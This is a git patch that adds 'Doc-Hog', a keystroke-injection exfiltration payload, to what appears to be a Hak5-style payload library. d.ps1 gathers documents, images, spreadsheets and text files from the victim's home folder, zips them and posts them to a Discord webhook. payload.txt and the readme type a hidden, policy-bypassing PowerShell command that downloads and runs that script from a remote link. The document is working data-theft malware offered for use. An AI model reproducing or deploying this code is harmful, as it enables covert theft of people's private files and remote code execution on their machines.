From d54cb1929051fb0f28be6982a10b0bafdb054821 Mon Sep 17 00:00:00 2001
From: Gavin Kramer <75549184+atomiczsec@users.noreply.github.com>
Date: Thu, 13 Jul 2023 15:54:00 -0400
Subject: [PATCH] Add files via upload

---
 payloads/library/exfiltration/Doc-Hog/d.ps1   | 51 +++++++++++
 .../library/exfiltration/Doc-Hog/payload.txt  | 14 +++
 .../library/exfiltration/Doc-Hog/readme.md    | 87 +++++++++++++++++++
 3 files changed, 152 insertions(+)
 create mode 100644 payloads/library/exfiltration/Doc-Hog/d.ps1
 create mode 100644 payloads/library/exfiltration/Doc-Hog/payload.txt
 create mode 100644 payloads/library/exfiltration/Doc-Hog/readme.md

diff --git a/payloads/library/exfiltration/Doc-Hog/d.ps1 b/payloads/library/exfiltration/Doc-Hog/d.ps1
new file mode 100644
index 000000000..77508676b
--- /dev/null
+++ b/payloads/library/exfiltration/Doc-Hog/d.ps1
@@ -0,0 +1,51 @@
+function Doc-Hog {
+    [CmdletBinding()]
+    param (
+        [parameter(Position=0,Mandatory=$False)]
+        [string]$file,
+        [parameter(Position=1,Mandatory=$False)]
+        [string]$text 
+    )
+
+    $hookurl = 'DISCORD-WEBHOOK'
+
+    $Body = @{
+      'username' = $env:username
+      'content' = $text
+    }
+
+    if (-not ([string]::IsNullOrEmpty($text))) {
+        Invoke-RestMethod -ContentType 'Application/Json' -Uri $hookurl  -Method Post -Body ($Body | ConvertTo-Json)
+    }
+
+    if (-not ([string]::IsNullOrEmpty($file))) {
+        curl.exe -F "file1=@$file" $hookurl
+    }
+}
+
+$Files = Get-ChildItem -Path "$env:HOMEPATH" -Include "*.docx","*.doc","*.pptx","*.xlsx","*.pdf","*.jpeg","*.png","*.jpg","*.csv","*.txt" -Recurse
+
+$types = @{
+    "*.docx" = "Word";
+    "*.doc" = "Word";
+    "*.pptx" = "PowerPoint";
+    "*.xlsx" = "Excel";
+    "*.pdf" = "PDF";
+    "*.jpeg" = "JPEG";
+    "*.png" = "PNG";
+    "*.jpg" = "JPEG";
+    "*.csv" = "CSV";
+    "*.txt" = "Text";
+}
+
+foreach ($type in $types.Keys) {
+    $filteredFiles = $Files | Where-Object {$_.Name -like $type}
+
+    if ($filteredFiles) {
+        $zipFile = "$env:TEMP\$($types[$type]).zip"
+
+        $filteredFiles | Compress-Archive -DestinationPath $zipFile
+
+        Doc-Hog -file $zipFile -text "Uploading $($types[$type]) files"
+    }
+}
diff --git a/payloads/library/exfiltration/Doc-Hog/payload.txt b/payloads/library/exfiltration/Doc-Hog/payload.txt
new file mode 100644
index 000000000..65c190079
--- /dev/null
+++ b/payloads/library/exfiltration/Doc-Hog/payload.txt
@@ -0,0 +1,14 @@
+REM     Title: Doc-Hog
+REM     Author: atomiczsec
+REM     Description: This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
+
+DEFINE URL http://new-url.com/powershell.ps1
+
+REM     Target: Windows 10
+QUACK DELAY 2000
+QUACK GUI r
+QUACK DELAY 500
+QUACK STRING powershell -w h -NoP -NonI -ep Bypass $pl = iwr $URL dl=1; iex $pl
+QUACK ENTER
+REM     Remember to replace the link with your DropBox shared link for the intended file to download
+REM     Also remember to replace ?dl=0 with ?dl=1 at the end of your link so it is executed properlymode con:cols=14 lines=1
\ No newline at end of file
diff --git a/payloads/library/exfiltration/Doc-Hog/readme.md b/payloads/library/exfiltration/Doc-Hog/readme.md
new file mode 100644
index 000000000..833d12fac
--- /dev/null
+++ b/payloads/library/exfiltration/Doc-Hog/readme.md
@@ -0,0 +1,87 @@
+
+<h1 align="center">
+  <a href="https://git.io/typing-svg">
+    <img src="https://readme-typing-svg.herokuapp.com/?lines=Welcome+to+the;Doc+Hog!+😈&center=true&size=30">
+  </a>
+</h1>
+
+<!-- TABLE OF CONTENTS -->
+<details>
+  <summary>Table of Contents</summary>
+  <ol>
+    <li><a href="#Description">Description</a></li>
+    <li><a href="#getting-started">Getting Started</a></li>
+    <li><a href="#Contributing">Contributing</a></li>
+    <li><a href="#Version-History">Version History</a></li>
+    <li><a href="#Contact">Contact</a></li>
+    <li><a href="#Acknowledgments">Acknowledgments</a></li>
+  </ol>
+</details>
+
+# Doc-Hog
+
+A payload to exfiltrate all files like, PNG, DOCX, PDF, TXT, Excel, JPEG, and CSV
+
+## Description
+
+This payload will enumerate through the files. Then create ZIPs with them, then send to a discord webhook.
+
+## Getting Started
+
+### Dependencies
+
+* DropBox or other file sharing service - Your Shared link for the intended file
+* Windows 10,11
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+### Executing program
+
+* Plug in your device
+* Invoke-WebRequest will be entered in the Run Box to download and execute the script from memory
+```
+powershell -w h -NoP -NonI -ep Bypass $pl = iwr < Your Shared link for the intended file> ?dl=1; iex $pl
+```
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Contributing
+
+All contributors names will be listed here
+
+atomiczsec
+I am Jakoby
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+## Version History
+
+* 0.1
+    * Initial Release
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- CONTACT -->
+## Contact
+
+<div align="center">
+  <a href="https://lnk.bio/atomiczsec">
+    <img src="https://github.com/atomiczsec/My-Payloads/blob/main/Assets/sharethis-social-media-svgrepo-com.svg" width="48" height="48" alt="Link" />
+  </a>
+</div>
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+
+
+
+<p align="right">(<a href="#top">back to top</a>)</p>
+
+<!-- ACKNOWLEDGMENTS -->
+## Acknowledgments
+
+* [Hak5](https://hak5.org/)
+* [I-Am-Jakoby](https://github.com/I-Am-Jakoby)
+
+<p align="right">(<a href="#top">back to top</a>)</p>
\ No newline at end of file